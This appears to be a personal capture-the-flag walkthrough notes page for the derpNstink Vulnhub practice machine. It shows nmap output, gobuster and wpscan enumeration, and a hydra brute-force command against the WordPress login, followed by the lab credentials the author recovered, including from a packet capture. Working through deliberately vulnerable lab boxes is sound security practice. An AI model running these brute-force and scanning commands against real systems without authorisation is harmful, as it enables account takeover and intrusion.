// notes/ Practice Boxes
📦
derpNstink — Vulnhub
Walkthrough notes for the derpNstink box (Vulnhub).
#vulnhub#ctf#walkthrough#boxes
derpNstink — Vulnhub
nmap
🐺 howlsec@kalicode
01PORT STATE SERVICE REASON VERSION0221/tcp open ftp syn-ack ttl 64 vsftpd 3.0.20322/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)04| ssh-hostkey: 05| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)06| ssh-dss AAAAB3NzaC1kc3MAAACBAMZoT7661ewMcQgzna/qzvkfYaLGwfMnL0VKh3hkBCwGw3jvSXjmjhKw/gR2TnTLFQ9eTDNPTuGsm87dOUSEunbZMvP9GgnA9hOUCI9T1oy5Rs4/AidB9uiVAKN+mefOBBkwhO74UkzNCZw+SX214uaEyK5tQxcROT8hqqLPbu2lAAAAFQCYTgxWroPZExKzHRqCJUbgQaCV6wAAAIEAifRo93uYV4W0l81ybohh+U2vZdqF7FLMXpyvVLv3wcSs1fa6w+0idZ076luA/RWcO/Cavp1q2Yvvyp7E/uKPe9fuDV8Qp4g3FArPQB/Bg+CUL90tNLcAiI+0b6lS8ByfwgMzcinP8fzjWeo3ZRyyU+nGqQaoF9kC951bloDJ48sAAACASzBGZ/bwnBU0oZxhuDg4c2YxD+R96JWBvDvMrqlxqZO1NsAAq5o/GU26++Yrk15mXFZgtkVBxeFXSErjwPkHfMWqY/TNOybUptUtnrqQlvN8tB4VW9sJwbT1AmnAyJZRJZ00x8cxzqvgD6qRyPJCCdNQsUiAnpDQ8RQ5v0cY67M=07| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)08| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCog1WR41f7pXHcoQcEEDgeARy4bpquU6qGdWxOoc7CSjatxW2e8qi3Le/66/nER15eOFqFXV6dQcS/FQOqjPYtRugPNL16Idrq6BBRhmle+AUCb2Yjwq3rzPnOzonFj2q5FSi6zzMIhTbrIwB8xF9rEazw/4DInYKCChtN7+xZC5SWk5tXf9/2hrWhvEg8mM0HYjs31SkfO2qn4OyV6/rT+sPts39ILVLN7p8IiOU8vFdbOt4K5xPgTlUIFdHotVHjkakgYZ2cb32DCu/c/qZ3xRU2kcTL2qjL4Q6crDajXWBpyNGyFhjx88hindUTU6I6BnaWCjaDFabk7JODrf8J09| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)10| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPbUzlHO4L0CcRTLxyaFkqvqoQikn5j1oipMTeYmvIp4D3o7Ht4tvVG9H+hGyX2+jz5cHwx9knygVi9CuXDU9t4=11| 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)12|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5AF6Fe/U78KCW1vdVjGoYR9NHOpICUnz6uQgVGETII1380/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))14|_http-title: DeRPnStiNK15| http-robots.txt: 2 disallowed entries 16|_/php/ /temporary/17| http-methods: 18|_ Supported Methods: GET HEAD POST OPTIONS19|_http-server-header: Apache/2.4.7 (Ubuntu)20MAC Address: 08:00:27:D2:47:B1 (Oracle VirtualBox virtual NIC)21Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelnotes
🐺 howlsec@kalicode
01gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.1.49 -o initial_dir
weblog is a wordpress site. It redirects us to http://derpnstink.local so we need to add it to /etc/hosts. Virtual host routing.
🐺 howlsec@kalicode
01wpscan --url <http://derpnstink.local/weblog/> -e vt,tt,u,ap 
🐺 howlsec@kalicode
01hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.49 http-post-form '/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=Location' -V -e nsr -f -t 50

🐺 howlsec@kalicode
01unclestinky:wedgie5702admin:admin
FOUND PCAP FILE

tranferred it to kali for wireshark

went through all http requests i could find. Found these credentials:
🐺 howlsec@kalicode
01mrderp02derpderpderpderpderpderpderpYou can find clear text credentials over ### FTP, SMTP, HTTP, POP3, IMAP4, SNMP, LDAP etc..
https://www.infosecmatter.com/capture-passwords-using-wireshark/

This will be ezpz
